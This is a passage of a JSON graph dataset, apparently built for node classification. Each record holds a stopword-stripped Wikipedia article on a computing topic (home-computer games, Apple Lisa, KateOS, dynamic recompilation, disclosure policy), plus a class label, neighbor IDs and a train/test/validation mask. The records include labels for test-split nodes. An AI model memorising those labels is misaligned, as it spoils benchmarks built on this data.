      4217,
      4603,
      5503
    ],
    "mask": "None"
  },
  {
    "node_id": 4109,
    "label": 3,
    "text": "Chuckie_Egg:chuckie egg chuckie egg home computer video game released f software 1983 initially zx spectrum bbc micro dragon subsequent popularity saw released following years wide variety computers including commodore 64 acorn electron msx tatung einstein amstrad cpc atari 8-bit family later updated released amiga atari st ibm pc game written nigel alderton 16 17 years old month two development nigel took pre-release version spectrum code two-year-old software company f co-founded doug anderson mike fitzgerald f respectively doug took simultaneous development bbc micro version whilst mike webb f employee completed dragon port chuckie egg went sell million copies remained steady earner f company went administration late 1980s versions fall broadly two groups — realistic physics e.g bbc micro amstrad cpc versions without e.g zx spectrum version although substantial difference play two levels remain largely 8-bit versions cited classics hen-house harry player must collect twelve eggs positioned level countdown timer reaches zero addition piles seed may collected increase points stop countdown timer otherwise eaten hens patrol level causing pause player touches hen falls gap bottom level loses life level made solid platforms ladders occasionally lift platforms constantly move upwards upon leaving top screen reappear bottom hitting top screen one lifts however also cause player lose life eight levels defined played initially watch giant caged duck upon completion eight levels played without hens harry pursued freed duck flying around screen homing second completion eight levels yields third play hens duck fourth pass introduces additional hens finally fifth pass duck additional hens moving greater speed player completes forty levels advance 'level 41 fact exactly level 33 player starts five lives extra life awarded every 10,000 points zx spectrum version rated number 13 sinclair official top 100 games time chuckie egg also followed two years first release sequel entitled chuckie egg 2 available much smaller subset platforms release changed genre quite radically involved player harry working factory attempting create easter eggs complete toy jet set willy-style graphic adventure whilst first game level one single screen new version levels covering multiple screens although sequel gained small number admirers never received attention original 2017 remake super chuckie egg released onto mobile devices official apparently f approved chuckie egg upgrade bbc electron machines called chukee published small company called bit twiddlers gave player ability start level also introduced extended jump feature instituted holding key whilst jumping one earliest available 'hacks 8-bit computer 2009 organ grinder monkey produced unofficial upgrade original chuckie egg bbc electron includes full level editor set eight new levels",
    "neighbors": [
      9006,
      11311,
      7536,
      10931,
      1527
    ],
    "mask": "Test"
  },
  {
    "node_id": 4110,
    "label": 3,
    "text": "Oh_Mummy:oh mummy oh mummy computer game amstrad cpc models home computer developed gem software published amsoft 1984 often included free bundles software came computer gameplay similar 1981 arcade game amidar object game unveil treasure within level pyramid game whilst avoiding mummies level consists two-dimensional board contrast pac-man player character walks around footprints left behind surrounding area maze footprints content revealed either scroll mummy key tomb nothing order complete level necessary unveil key tombstone scroll enables player kill/eat one mummy level mummy unveiled follows player next level difficulty speed game increases player progresses levels game primarily one player limited multiplayer mode players alternate taking turn play level whilst even time considered simple terms gameplay graphics sound many people one better addictive early offerings amstrad music played gameplay based children song streets cairo poor little country maid game also released msx zx spectrum amstrad cpc 464 tatung einstein zx spectrum version given away one several introductory software packs computer particular pack also including crazy golf alien destroyer punchy treasure island disco dan",
    "neighbors": [
      7536,
      2898,
      9006,
      3039
    ],
    "mask": "Train"
  },
  {
    "node_id": 4111,
    "label": 2,
    "text": "Quartz_Composer:quartz composer quartz composer node-based visual programming language provided part xcode development environment macos processing rendering graphical data quartz composer uses opengl including glsl opencl mac os x 10.6 later core image core video javascript technologies create api developer tool around simple visual programming paradigm apple embedded quartz technologies deeply operating system compositions created quartz composer played standalone quicktime-aware application although mac os x 10.4 later system screen saver itunes visualizer inside quartz composer application embedded cocoa carbon application via supplied user interface widgets quartz composer included iphone sdk way running quartz compositions ios devices quartz programming quartz composer works implementing connecting patches similar routines traditional programming languages patches base processing units execute produce result better performance patch execution follows lazy evaluation approach meaning patches executed output needed three types patches consumers processors external input patches receive output mouse clicks scrolls movements midi audio keyboard movements collection patches melded one called macro macros nested subroutines also edited control order rendering renderer assigned layer indicated upper-right corner layers rendered sequentially lowest highest renderers enabled disabled essentially turning particular layer turning unused layers often results better performance since fewer upstream patches need evaluated patches subpatches allows global parameter changes included subpatches useful lighting 3d transformation glsl shaders among things subpatch support indicated square corners patch rather typical rounded corners version 3.0 became possible turn compositions virtual patches allow user reuse functionality without store duplicate copies composition quartz composer editor allows user save flattened copy virtual patches fully expanded inside easy distribution version 4.0 extended functionality even automatically includes flattened copies virtual patches use fallback desired virtual patch n't installed host system greatly simplifies composition distribution network functionality greatly improved release leopard became possible transmit data synchronize network interface also added support open sound control transmission reception also new version 3.0 possibility write custom patch plugins using xcode template notion safe mode plugins unsafe patches fail load prevents malicious compositions performing dangerous insecure operations custom patches using apple xcode template always considered unsafe possible develop custom patch plugins version 2.0 api undocumented private never supported apple eventually templates released simplify procedure quartz composer editor holding option key selecting preferences ... menu adds 3 additional tabs options user configure options include system settings editor settings quicktime integration settings notable options include expanded tooltips software rendering uncapped framerate rendering multisample antialiasing msaa added hidden option version 4.0 allowing antialiasing inside qc editor though works gpu support msaa data inside qc one following types two additional types introduced version 4.0 data usually converted types transparently quartz composer 3.0 connections patches change color indicate conversions taking place yellow connections mean conversion taking place orange indicates possible loss data conversion number index red indicates severe conversion image boolean example quartz composer documents called compositions compositions binary property lists though xml versions also supported filename extension .qtz com.apple.quartz-composer-composition uti patches connections input port states saved composition file images stored inside composition well making self-contained compositions embedded graphics dragging movie file quartz composer editor reference movie file created providing changing image connected renderer compositions also store metadata composition author copyright description user also add arbitrary metadata items desired many image formats supported including jpeg jpeg2000 gif png tiff tga openexr bmp ico pdf pict icns raw digital camera types images maintained native form long possible rasterizing display means quartz composer keep vector images vectors cropping scaling rotating translating allows work large logical image dimensions without consuming large amounts memory processing time functionality apparent working text-based images pdfs version 3.0 added ability add annotations areas composition called notes notes parallel comments programming languages notes yellow red green blue gray overlap notes version 3.0 concept composition protocols introduced protocols provide template required optional inputs outputs qualify conforming compositions various purposes following protocols available default additional protocol apple uses private api one new protocol added version 4.0 officially supported way add additional protocols quartz composer however undocumented methods may make possible future addition protocols compositions also conform different runtimes quartz composer available leopard runtimes tiger 32-bit well 32-bit 64-bit versions leopard quartz composer runtime editor also indicate used patches unsafe unavailable tiger aid making compatible compositions system-wide composition repository available version 3.0 allows applications share make use common compositions effects processing also possible applications query repository compositions match certain criteria protocol conformance repository spread across 3 file system locations adding compositions repository simple adding composition file one locations became possible compare compositions quartz composer 3.0 feature allows user compare inputs rendered output graph appearance two compositions developer tool called quartz composer visualizer released quartz composer 3.0 allows compositions rendered across multiple screens single machine even spanned across several machines displays support automator actions added release leopard pierre-olivier latour originally developed predecessor quartz composer name pixelshox studio",
    "neighbors": [
      2691,
      10755,
      3462,
      6023,
      6536,
      9100,
      1549,
      5784,
      9762,
      10406,
      11430,
      6186,
      3371,
      7983,
      8754,
      8627,
      7991,
      2363,
      2365,
      2366,
      576,
      5696,
      7292,
      7378,
      3286,
      1623,
      4186,
      4571,
      7133,
      7422,
      479,
      3681,
      3691,
      3948,
      4844,
      10478,
      8303,
      5619,
      2676,
      5500,
      6654
    ],
    "mask": "None"
  },
  {
    "node_id": 4112,
    "label": 9,
    "text": "Dynamic_recompilation:dynamic recompilation computer science dynamic recompilation sometimes abbreviated dynarec pseudo-acronym drc feature emulators virtual machines system may recompile part program execution compiling execution system tailor generated code reflect program run-time environment potentially produce efficient code exploiting information available traditional static compiler dynamic recompilers used convert machine code architectures runtime task often needed emulation legacy gaming platforms cases system may employ dynamic recompilation part adaptive optimization strategy execute portable program representation java .net common language runtime bytecodes full-speed debuggers also utilize dynamic recompilation reduce space overhead incurred deoptimization techniques features dynamic thread migration main tasks dynamic recompiler perform dynamic recompiler may also perform auxiliary tasks suppose program run emulator needs copy null-terminated string program compiled originally simple processor processor copy byte time must first reading source string register writing register destination string original program might look something like emulator might running processor similar extremely good copying strings emulator knows take advantage might recognize string copy sequence instructions decide rewrite efficiently execution speed emulation say instruction new processor called movs specifically designed copy strings efficiently theoretical movs instruction copies 16 bytes time without load register c stop copies 0 byte marks end string set zero flag also knows addresses strings registers b increments b 16 every time executes ready next copy new recompiled code might look something like immediate speed benefit simply processor n't load many instructions task also movs instruction likely optimized processor designer efficient sequence used first example example may make better use parallel execution processor increment b still copying bytes",
    "neighbors": [
      1409,
      5378,
      7173,
      6150,
      7941,
      8712,
      6153,
      1042,
      10516,
      10013,
      2334,
      1952,
      8609,
      5154,
      7462,
      5677,
      814,
      815,
      7983,
      9006,
      9774,
      9525,
      9911,
      2620,
      576,
      10316,
      6477,
      10703,
      3413,
      8280,
      9432,
      11644,
      7134,
      3553,
      8037,
      10470,
      8937,
      8554,
      5356,
      9964,
      5872,
      9714,
      4980,
      2808,
      3066,
      8700,
      7421
    ],
    "mask": "None"
  },
  {
    "node_id": 4113,
    "label": 2,
    "text": "KateOS:kateos kateos linux distribution originally based slackware designed intermediate users package management system used called tgzex .tgz packages unlike slackware packages support dependency tracking optional internationalized descriptions designed ease update two native tools package management pkg updateos last version released kateos iii 3.6 including live cd 2007 kateos project founded end 2003 damian rakowski kate linux 1.0 rabbit series first version system published 2004-10-09 system based slackware 9.0 unlike slackware used pam authentication mechanism possessed enriched package set due problems main server worked infrequently hardly anyone learned existence kate 1.0 move another server project begun gradually acquire users time kate 1.0.1 fix release including updatepack 1 live version published kate linux 2.0 zyklon series ii version 2.0 published 2005-04-09 longer based slackware long-term edition base development also first edition using linux 2.6 2005-05-06 name project changed kateos 2005-05-22 version 2.0.1 published providing tool managing remote updating tgzex packages tool called updateos written piotr korzuszek 2005-06-23 version 2.1 published updateos could install packages remotely 12 august 2005 first live edition series ii published distinctive graphical design used squashfs technology 2 gb data packed one cd unionfs detected hardware configured x server automatically 2005-10-13 last version series ii published 2.3 updateos gained new possibilities system better hardware autodetection discover tool kateos 3.0 virgen series iii 12 april 2006 first snapshot kateos 3.0 published 2006-07-09 version 3.0 published packaging system completely rewritten resulting pkg updateos2 tools libupdateos libsmarttools libraries functionality tgzex packages widened time include dependency tracking descriptions many languages installation process simplified allow full install 15 minutes system used udev d-bus hal detect hardware mount devices automatically 4 august 2006 first 'live edition series iii published aimed demonstrate possibilities kateos 3.0 used data rescue system cd contained 2gb data including xfce desktop environment many office multimedia applications detected configured hardware automatically 7 october 2006 version 3.1 published contained fixes updated gnome desktop environment first edition gnome adjusted especially kateos system also included update-notifier daemon system trace icon changed blinked new updates discovered let user choose packages updated update based libupdateos library supported kateos packages repositories 21 december 2006 version 3.2 published apart fixes updates included new tool katepkg katepkg graphical package manager written php php-gtk library making kateos first system include library default distribution designed allow users easily install update remove packages system supports number repositories including local ones located user hard drive also libsmarttools library optimized resulting 60 speed boost applications using updateos2 version kateos switched bootloader lilo grub make kernel updates easier 17 september 2007 version 3.6 released eight months development version brought several new updated features kateos software driven suspend mode improved internalization support addition several new programs katelan realm help make configuring system user friendly live cd version 3.6 first kateos provide disc installer called install agent allowing user directly install hard disk trying system live new kateos releases planned supported around two years users encouraged update via updateos command newer versions distribution although major version updates series updates e.g ii -- iii recommended damian rakowski 'project initiator leader 1st developer stated project named friend name kate simple nice everybody knows",
    "neighbors": [
      8837,
      7435,
      10127,
      2321,
      5397,
      4887,
      10394,
      673,
      3745,
      10530,
      9253,
      6694,
      10149,
      11305,
      7854,
      2738,
      4790,
      439,
      56,
      59,
      7483,
      3903,
      4673,
      8644,
      2375,
      4039,
      8907,
      1110,
      9693,
      2143,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      8177,
      9074,
      5363,
      9461,
      6393,
      11388,
      8957,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 4114,
    "label": 3,
    "text": "Apple_Lisa:apple lisa lisa desktop computer developed apple released january 19 1983 one first personal computers offer graphical user interface gui machine aimed individual business users development lisa began 1978 underwent many changes development period shipping us 9,995 five-megabyte hard drive lisa challenged high price insufficient performance insufficient software library crash-prone operating system unreliable apple fileware twiggy floppy disks immediate release cheaper faster macintosh — yielding lifelong sales 10,000 units two years 1982 steve jobs forced lisa project appropriated existing macintosh project jef raskin conceived 1979 led develop text-based appliance computer jobs immediately redefined macintosh cheaper usable version graphical lisa macintosh launched january 1984 quickly surpassing lisa sales assimilating increasing numbers lisa staff newer lisa models introduced addressed faults lowered price considerably platform failed achieve favorable sales compared much less expensive mac final model lisa 2/10 modified high end macintosh series macintosh xl considered commercial failure technical acclaim lisa introduced number advanced features would reappear macintosh many years include operating system protected memory document-oriented workflow hardware overall advanced macintosh hard drive support 2 megabytes mb random-access memory ram expansion slots larger higher-resolution display main exception 68000 processor macintosh clocked 7.89 megahertz mhz lisa 5 mhz complexity lisa operating system associated programs overtaxes slower processor enough users perceive sluggish workstation-tier price lack technical application library made unviable technical workstation market though documentation shipped original lisa refers lisa apple officially stated name acronym locally integrated software architecture lisa steve jobs first daughter named lisa nicole brennan born 1978 normally inferred name also personal association perhaps acronym backronym invented later fit name andy hertzfeld states acronym reverse engineered name lisa late 1982 apple marketing team hired marketing consultancy firm come names replace lisa macintosh time considered jef raskin merely internal project codenames rejected suggestions privately hertzfeld software developers used lisa invented stupid acronym recursive backronym computer industry pundits coined term let invent acronym fit lisa name decades later jobs would tell biographer walter isaacson obviously named daughter project began 1978 effort create modern version then-conventional design epitomized apple ii ten-person team occupied first dedicated office nicknamed good earth building located 20863 stevens creek boulevard next restaurant named good earth initial team leader ken rothmuller soon replaced john couch whose direction project evolved window-and-mouse-driven form eventual release trip hawkins jef raskin contributed change design apple cofounder steve jobs involved concept xerox palo alto research center research already underway several years create new humanized way organize computer screen today known desktop metaphor steve jobs visited xerox parc 1979 absorbed excited revolutionary mouse-driven gui xerox alto late 1979 jobs successfully negotiated payment apple stock xerox exchange lisa team receive two demonstrations ongoing research projects xerox parc apple team saw demonstration alto computer able see action basic elements constituted workable gui lisa team put great deal work making graphical interface mainstream commercial product lisa major project apple reportedly spent 50 million development 90 people participated design plus sales marketing effort launch machine byte credited wayne rosing important person development computer hardware machine went production point became technical lead entire lisa project hardware development team headed robert paratore industrial design product design mechanical packaging headed bill dresselhaus principal product designer lisa team internal product designers contract product designers firm eventually became ideo bruce daniels charge applications development larry tesler charge system software user interface designed six month period hardware operating system applications created parallel 1982 steve jobs forced lisa project appropriated existing macintosh project jef raskin conceived 1979 led develop text-based appliance computer jobs redefined macintosh cheaper usable lisa leading project parallel secret substantially motivated compete lisa team september 1981 announcement ibm pc infoworld reported lisa mcintosh another apple computer secretly development ready release within year described lisa 68000 128kb ram designed compete new xerox star considerably lower price may 1982 magazine reported apple yet-to-be-announced lisa 68000 network work station also widely rumored mouse lisa low sales quickly surpassed january 1984 launch macintosh newer versions lisa introduced addressed faults lowered price considerably failed achieve favorable sales compared much less expensive mac macintosh project assimilated lot lisa staff final revision lisa lisa 2/10 modified sold macintosh xl high cost delays release date contributed lisa discontinuation although repackaged sold 4,995 lisa 2 1986 entire lisa platform discontinued 1987 sun remarketing purchased 5,000 macintosh xls upgraded leftover lisa computers spare parts available recently cherokee data purchased sun remarketing went business 1989 help sun remarketing apple disposed approximately 2,700 unsold lisas guarded landfill logan utah order receive tax write-off unsold inventory lisa first introduced january 19 1983 one first personal computer systems graphical user interface gui sold commercially uses motorola 68000 cpu clocked 5 mhz 1 mb ram lisa computer real-time clock uses 4-bit integer base year defined 1980 software wo n't accept value 1981 valid range 1981–1995 thus 1995 problem real-time clock depended 4 x aa-cell nicd pack batteries lasted hours main power present often causing packs burst open leak corrosive alkaline electrolyte could ruin circuit boards original lisa lisa 1 two apple fileware 5.25-inch double-sided floppy disk drives commonly known apple internal code name drive twiggy capacity approximately 871 kb proved unreliable required special diskettes macintosh intended implement single twiggy drive partway development revised use sony 400 kb microfloppy drive optional external 5 mb later 10 mb apple profile hard drive originally designed apple iii available introduction lisa 2/10 optional 10 mb internal proprietary hard disk manufactured apple known widget also offered first hardware revision lisa 2 released january 1984 priced 3,495 5,495 us much less expensive original model dropped twiggy floppy drives favor single 400k sony microfloppy lisa 2 little 512 kb ram lisa 2/5 consists lisa 2 bundled external 5- 10-megabyte hard drive 1984 time macintosh officially announced apple offered free upgrades lisa 2/5 lisa 1 owners swapping pair twiggy drives single 3.5-inch drive updating boot rom i/o rom addition lisa 2 new front faceplate included accommodate reconfigured floppy disk drive change lisa 2 notable distinction introducing new inlaid apple logo well first snow white design language features lisa 2/10 features 10mb internal hard drive external parallel port standard configuration 1mb ram developing early macintosh software required lisa 2 relatively third-party hardware offerings lisa compared earlier apple ii ast offered 1.5 mb memory board – combined standard apple 512 kb memory board – expands lisa total 2 mb memory maximum amount mmu address late product life lisa third-party hard disk drives scsi controllers double-sided 3.5-inch floppy-disk upgrades unlike original macintosh lisa features expansion slots conversely like apple ii open system lisa 2 motherboard basic backplane virtually electronic components plenty edge connector sockets slots two ram slots one cpu upgrade slot one i/o slot parallel placement end three lisa slots parallel january 1985 following macintosh lisa 2/10 integrated 10 mb hard drive rebranded macintosh xl given hardware software kit enabling reboot macintosh mode positioning apple high-end macintosh price lowered yet 4,000 sales tripled ceo john sculley said apple would lost money increasing production meet new demand apple discontinued macintosh xl leaving eight-month void apple high-end product line macintosh plus introduced 1986 lisa operating system features protected memory enabled crude hardware circuit compared sun-1 workstation c. 1982 features full memory management unit based part elements failed apple iii sos operating system released three years earlier lisa disk operating system also organizes files hierarchical directories unix workstations time main competition lisa terms price hardware filesystem directories correspond gui folders previous xerox parc computers lisa borrowed heavily conceptually lisa resembles xerox star sense envisioned office computing system consequently lisa two main user modes lisa office system workshop lisa office system gui environment end users workshop program development environment almost entirely text-based though uses gui text editor lisa office system eventually renamed 7/7 reference seven supplied application programs lisawrite lisacalc lisadraw lisagraph lisaproject lisalist lisaterminal operating system – rather applications – incapable supporting demands advanced users prone crash restart heavy load large complex spreadsheets graphs produced apple warranty said software works precisely stated apple refunded unspecified number users full systems operating system frailties costly recalls combined high price point led failure lisa marketplace within months lisa introduction us fully translated versions software documentation commercially available british french west german italian spanish markets followed several scandinavian versions shortly thereafter user interface os seven applications lisaguide lisa diagnostics rom fully translated without programming required using resource files translation kit keyboard identify native language layout entire user experience language including hardware diagnostic messages although several non-english keyboard layouts available dvorak keyboard layout never ported lisa though porting available apple iii iie iic later done macintosh keyboard-mapping lisa complex requires building new os kernels contain images layouts due serious memory constraints keyboard layouts stored differences set standard layouts thus bytes needed accommodate additional layouts exception dvorak layout moves every key thus requires hundreds extra bytes precious kernel storage regardless whether needed localized version built globalized core requires grammatical linguistic cultural adaptations throughout user interface including formats dates numbers times currencies sorting even word phrase order alerts dialog boxes kit provided translation work done native-speaking apple marketing staff country localization effort resulted many lisa unit sales outside us inside us product lifespan setting new standards future localized software products global project co-ordination april 1984 following release macintosh apple introduced macworks software emulation environment allows lisa run macintosh system software applications macworks helped make lisa attractive potential customers although enable macintosh emulation access hard disk september january 1985 re-branded macworks xl became primary system application designed turn lisa macintosh xl significant impediment third-party software lisa fact first launched lisa office system could used write programs separate development os called lisa workshop required development process engineers would alternate two oses startup writing compiling code one os testing later lisa workshop used develop software macintosh years macintosh-native development system developed lifetime lisa never went beyond original seven applications apple deemed enough everything although unipress software offer unix system iii 495 byte wrote february 1983 previewing lisa important development computers last five years easily outpacing ibm pc acknowledged 9,995 price high concluded apple ... unaware people would incredibly interested similar less expensive machine 'll see happens apple lisa commercial failure apple largest since failure apple iii 1980 apple sold approximately 10,000 lisa machines price generating total sales 100 million development cost 150 million corporate target market reluctant machine poor price-performance ratio high price put lisa price realm technical workstations without much technical application library lisa implementation requisite graphical interface paradigm novel costly sapping much computer resources away high end usage make business sense time largest lisa customer nasa used lisaproject project management lisa largely unable compete less expensive ibm pc dominating business desktop computing part due x86 platform backward compatibility cp/m operating system many existing business software applications originally written cp/m basic 1984 release macintosh half price better performance end lisa viability lisa 2 mac rom-enabled sibling macintosh xl final two releases lisa line discontinued april 1985 macintosh xl hardware software conversion kit effectively reboot lisa macintosh mode 1986 apple offered lisa xl owners opportunity return computer additional payment us 1,498 exchange macintosh plus hard disk 20 reportedly 2,700 working unsold lisa computers buried landfill macintosh project led apple cofounder steve jobs borrowed heavily lisa gui paradigm directly took many staff create apple ultimate flagship platform next several decades progenitor iphone apple culture object-oriented programming lisa contributed 1988 conception pink first attempt rearchitect operating system macintosh",
    "neighbors": [
      9732,
      7697,
      6675,
      6165,
      11289,
      7706,
      8222,
      1057,
      2594,
      6183,
      1576,
      4137,
      4139,
      7211,
      9778,
      9784,
      8253,
      8767,
      576,
      1090,
      8774,
      8783,
      11346,
      4180,
      10838,
      10840,
      9308,
      3167,
      9312,
      9826,
      7269,
      8806,
      8301,
      6258,
      7285,
      10357,
      4220,
      10365,
      7806,
      6783,
      10878,
      2179,
      6787,
      4741,
      8842,
      6283,
      6797,
      7824,
      147,
      9363,
      7830,
      6807,
      4258,
      7842,
      7844,
      3241,
      7849,
      2735,
      3248,
      4283,
      7869,
      8893,
      8896,
      8898,
      4807,
      4810,
      1744,
      3286,
      3293,
      9952,
      6884,
      6377,
      2282,
      1772,
      1776,
      10481,
      8441,
      11513,
      1290,
      3338,
      781,
      4879,
      784,
      1809,
      11539,
      8480,
      7460,
      10023,
      4910,
      4399,
      7983,
      7991,
      4409,
      11066,
      11257,
      9022,
      1346,
      6979,
      10052,
      10562,
      8524,
      8525,
      2383,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      1389,
      11629,
      10608,
      2933,
      9084,
      7549,
      6529,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      11171,
      8109,
      8114,
      2492,
      446,
      7614,
      5058,
      10691,
      4548,
      2502,
      456,
      1482,
      464,
      6608,
      8662,
      9174,
      10199,
      8665,
      9182,
      9700,
      5093,
      2023,
      5616,
      6130,
      499,
      5619,
      11251,
      2551,
      2553,
      8700,
      1534,
      511
    ],
    "mask": "None"
  },
  {
    "node_id": 4115,
    "label": 3,
    "text": "After_the_War_(video_game):war video game war video game published 1989 dinamic software player controls character post-apocalyptic city probably nuclear war released unreleased artworks luis royo alfonso azpiri reveals city post-nuclear version new york city game consisted two separate parts second half game made accessible successfully completing part one whereupon player given password 94656981 first part localized streets city sequence fights minor enemies big bosses target find entry city underground transport opposed part map second part localized railways stations city underground transport enemies bigger first load complex design character movements slightly different parts common movements move left right jump duck first part way fighting using fists legs second part gives character ability use kind futuristic gun loads featured parts two levels 16-bit versions featured digitized voices ports featured tricky graphical effects e.g. amstrad cpc version included mode 0 mode 1 graphics time war featured two classical fx brands dinamic fx double load consisting two separate parts get advantage computer memory fx giant sprites made use big sprites even ¾ total play area height note fx brands simply commercial names dinamic used name features games giant sprites trick sprites composed set small parts allowed reusing parts different characters e.g. lot enemies share trousers leg movements ports problem vertical sync monitor lets player easily see trick sometimes characters got rendered divided two clearly different slices computer magazines published notes coin-op version game never released outside spain although coin-op game could played many years ago parque de atracciones de madrid graphically identical 16-bit computers counterpart cover artwork war created artist luis royo time development began spanish comic book author alfonso azpiri collaborator dinamic creation box art games azpiri whose brother jorge contributed graphics amstrad cpc version war drew initial version intended cover artwork game however due protracted development schedule time game completed azpiri ended collaboration dinamic work software company topo soft war released new cover art commissioned royo 2011 nearly two decades since dissolution dinamic founding members acquired rights distribute windows game collapse spain italy new software company fx interactive game rebranded war marketed belonging fictional universe original 1989 game",
    "neighbors": [
      9166,
      10931,
      6797,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 4116,
    "label": 1,
    "text": "Fuzzy_Logix:fuzzy logix fuzzy logix develops high -performance analytics solutions big data fuzzy logix offers in-database gpu-based analytics solutions built comprehensive growing libraries 600 mathematical statistical simulation data mining time series financial models fuzzy logix formed 2007 partha sen mike upchurch met working bank america shared goal making analytics pervasive 2008 fuzzy logix released db lytix first complete commercially available library in-database analytics fin lytix released 2010 first comprehensive library in-database financial models 2010 aperity oem ’ fuzzy logix models run analytics cpg software saas solutions 2011 quest dell released toad data analyst data point included fuzzy logix ’ models running mysql company started charlotte nc usa headquarters located today fuzzy logix offices richmond va cupertino ca uk india reseller partners mexico sweden japan china fuzzy logix offers four software products db lytix fin lytix comprehensive libraries in-database analytic models libraries leverage user defined function udf capability available database platforms software available multiple database platforms since data movement database minimized database platforms growing increasingly powerful in-database models run 5x 100x faster models use multi-tiered analytics platforms fuzzy logix released first comprehensive library in-database models db lytix 2008 library development since 1998 library includes mathematical statistical data mining simulation classification models fuzzy logix released first comprehensive financial library fin lytix 2010 library contains models equity fixed income foreign exchange interest rate time series models used financial services industry risk management pricing portfolio optimization aster data informix netezza ibm puredata systems mysql paraccel sql server sybase iq teradata fuzzy logix solutions effective optimizing business process performance utilizing mathematical modeling based risk management industries like marketing healthcare insurance digital media services financial services investment retail banking brokerage houses stock exchanges hedge fund management examples techniques superior performance potentially utilized much broadly solving complex problems industries organization government programs educational institutions research need running analytics big data using complex models solutions derived predictive modeling behavior assessing risk modeling optimal system",
    "neighbors": [
      6850,
      7022,
      10511,
      11030,
      3196
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4117,
    "label": 4,
    "text": "Full_disclosure_(computer_security):full disclosure computer security field computer security independent researchers often discover flaws software abused cause unintended behaviour flaws called vulnerabilities process analysis vulnerabilities shared third parties subject much debate referred researcher disclosure policy full disclosure practice publishing analysis software vulnerabilities early possible making data accessible everyone without restriction primary purpose widely disseminating information vulnerabilities potential victims knowledgeable attack essay topic bruce schneier stated full disclosure – practice making details security vulnerabilities public – damned good idea public scrutiny reliable way improve security secrecy makes us less secure leonard rose co-creator electronic mailing list superseded bugtraq become de facto forum disseminating advisories explains n't believe security obscurity far know full disclosure way ensure everyone insiders access information need controversy around public disclosure sensitive information new issue full disclosure first raised context locksmithing 19th-century controversy regarding whether weaknesses lock systems kept secret locksmithing community revealed public today three major disclosure policies others categorized non disclosure coordinated disclosure full disclosure major stakeholders vulnerability research disclosure policies shaped various motivations uncommon observe campaigning marketing lobbying preferred policy adopted chastising dissent many prominent security researchers favor full disclosure whereas vendors prefer coordinated disclosure non disclosure generally favoured commercial exploit vendors blackhat hackers proponents coordinated disclosure believe software vendors right control vulnerability information concerning products primary tenet coordinated disclosure nobody informed vulnerability software vendor gives permission often exceptions variations policy distribution must initially limited vendors given privileged access nonpublic research advocates coordinated disclosure often prefer weighted less-descriptive term “ responsible disclosure ” coined microsoft security manager scott culp essay “ time end information anarchy ” referring full disclosure microsoft later asked term phased favour “ coordinated disclosure ” although reasoning varies many practitioners argue end-users benefit access vulnerability information without guidance patches vendor risks sharing research malicious actors great little benefit microsoft explain coordinated disclosure serves everyone best interests ensuring customers receive comprehensive high-quality updates security vulnerabilities exposed malicious attacks update developed full disclosure policy publishing information vulnerabilities without restriction early possible making information accessible general public without restriction general proponents full disclosure believe benefits freely available vulnerability research outweigh risks whereas opponents prefer limit distribution free availability vulnerability information allows users administrators understand react vulnerabilities systems allows customers pressure vendors fix vulnerabilities vendors may otherwise feel incentive solve fundamental problems coordinated disclosure full disclosure resolve discovery specific flaw vulnerability mutually exclusive event multiple researchers differing motivations discover flaws independently standard way make vulnerability information available public researchers often use mailing lists dedicated topic academic papers industry conferences non disclosure principle vulnerability information shared shared non-disclosure agreement either contractually informally common proponents non-disclosure include commercial exploit vendors researchers intend exploit flaws find proponents security obscurity researchers favour coordinated disclosure believe users make use advanced knowledge vulnerabilities without guidance vendor majority best served limiting distribution vulnerability information advocates argue low-skilled attackers use information perform sophisticated attacks would otherwise beyond ability potential benefit outweigh potential harm caused malevolent actors vendor prepared guidance even unsophisticated users digest information made public argument presupposes vulnerability discovery mutually exclusive event one person discover vulnerability many examples vulnerabilities discovered simultaneously often exploited secrecy discovery researchers may exist users benefit vulnerability information full disclosure advocates believe demonstrates contempt intelligence end users true users benefit vulnerability information 're concerned security networks position hire expert assist would hire mechanic help car non disclosure typically used researcher intends use knowledge vulnerability attack computer systems operated enemies trade knowledge vulnerability third party profit typically use attack enemies researchers practicing non disclosure generally concerned improving security protecting networks however proponents argue simply want assist vendors claim intent harm others full coordinated disclosure advocates declare similar goals motivations simply disagreeing best achieve non disclosure entirely incompatible",
    "neighbors": [
      1024,
      9217,
      5636,
      8725,
      535,
      9761,
      3619,
      4644,
      4133,
      5173,
      2558,
      1608,
      3657,
      8779,
      4703,
      8288,
      8292,
      9317,
      10875,
      3711,
      8320,
      5764,
      2187,
      4240,
      4755,
      1688,
      2717,
      9375,
      9904,
      9395,
      8886,
      10442,
      3789,
      4304,
      4314,
      9435,
      3807,
      1251,
      5349,
      1254,
      9447,
      10477,
      9460,
      2815,
      3843,
      10502,
      10003,
      1315,
      8489,
      11052,
      9518,
      11567,
      6473,
      6484,
      1369,
      857,
      1882,
      4956,
      3956,
      9082,
      11152,
      10132,
      1440,
      5024,
      8612,
      11175,
      5547,
      1970,
      441,
      1979,
      4027,
      4054,
      5078,
      1504,
      9186,
      4071,
      2542,
      507,
      9214
    ],
    "mask": "Test"
  },
  {
    "node_id": 4118,
    "label": 4,
    "text": "Martin_and_Mitchell_defection:martin mitchell defection martin mitchell defection occurred september 1960 two u.s. national security agency nsa cryptologists william hamilton martin bernon f. mitchell defected soviet union secret 1963 nsa study said beyond doubt event likely future greater impact agency security program martin mitchell met serving u.s. navy japan early 1950s joined nsa day 1957 defected together soviet union 1960 moscow press conference revealed denounced various u.s. policies especially provocative incursions air space nations spying america allies underscoring apprehension nuclear war said would attempt crawl moon thought would lessen threat atomic war within days citing trusted source congressman francis e. walter chairman house un-american activities committee huac said martin mitchell sex deviates prompting sensational press coverage u.s. officials national security council privately shared assumption two part traitorous homosexual network classified nsa investigations hand determined pair greatly inflated opinions concerning intellectual attainments talents defected satisfy social aspirations house un-american activities committee publicly intimated interpretation relationship martin mitchell homosexual reading guided pentagon discussion defection decades william hamilton martin may 27 1931 – january 17 1987 born columbus georgia family soon moved washington state father president ellensburg chamber commerce graduated ellensburg high school two years studies central washington college education central washington university earned degree mathematics university washington seattle 1947 enlisted united states navy served 1951 1954 working cryptologist naval security group japan martin played chess collected japanese sword handles tsuka bernon f. mitchell march 11 1929 – november 12 2001 born raised eureka california enlisted us navy one year college gained experience cryptologist tour duty navy 1951 1954 serving japan naval security group 